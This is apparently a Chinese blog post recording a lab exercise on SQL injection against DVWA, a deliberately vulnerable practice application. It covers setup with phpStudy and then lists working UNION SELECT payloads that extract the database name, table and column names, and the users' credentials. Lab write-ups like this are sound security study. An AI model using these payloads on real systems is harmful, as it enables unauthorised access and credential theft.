实验记录一之SQL注入

这只是我一次实验过程的记录!!!!

DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

安装部署phpStudy+DVWA漏洞演练平台

安装phpstudy,安装完成后启动phpStudy主界面,当看到 Apache 和 MySQL 文字后面红色的圆点变成绿色时,表示服务启动成功。

将DWVA压缩包解压到phpStudy的WWW文件夹中。配置DVWA链接数据库,打开config文件夹,打开config.inc.php,需要把db_password 修改成root,保存。​​​​​​
实验记录一之SQL注入_第1张图片
访问http://本机IP/DVWA/index.php,点击创建/重置数据库,点击创建数据库跳转到DVWA的登录界面,DVWA的默认用户名是"admin",密码“password”登录。输入用户名密码登录,登陆成功。在DVWA Security中设置难度为low。

SQL注入

1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。

2、输入1提交,将正常返回查询结果。

3、输入1’提交,将返回一个错误。
实验记录一之SQL注入_第2张图片
实验记录一之SQL注入_第3张图片
4、使用的sql语句可能是:select First name and Surname from 表名 where id=‘输入的id’。输入1’ union select 1,database()#提交,得到数据库名称。
实验记录一之SQL注入_第4张图片
5、输入1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#,得到数据库中的表名。
实验记录一之SQL注入_第5张图片
6、输入1’ union select 1,column_name from information_schema.columns where table_name=‘users’#,得到users表的列名。
实验记录一之SQL注入_第6张图片
7、输入1’ union select 1,concat(user,password) from users#,得到users表的所有用户名和密码。
实验记录一之SQL注入_第7张图片

你可能感兴趣的:(实验记录一之SQL注入)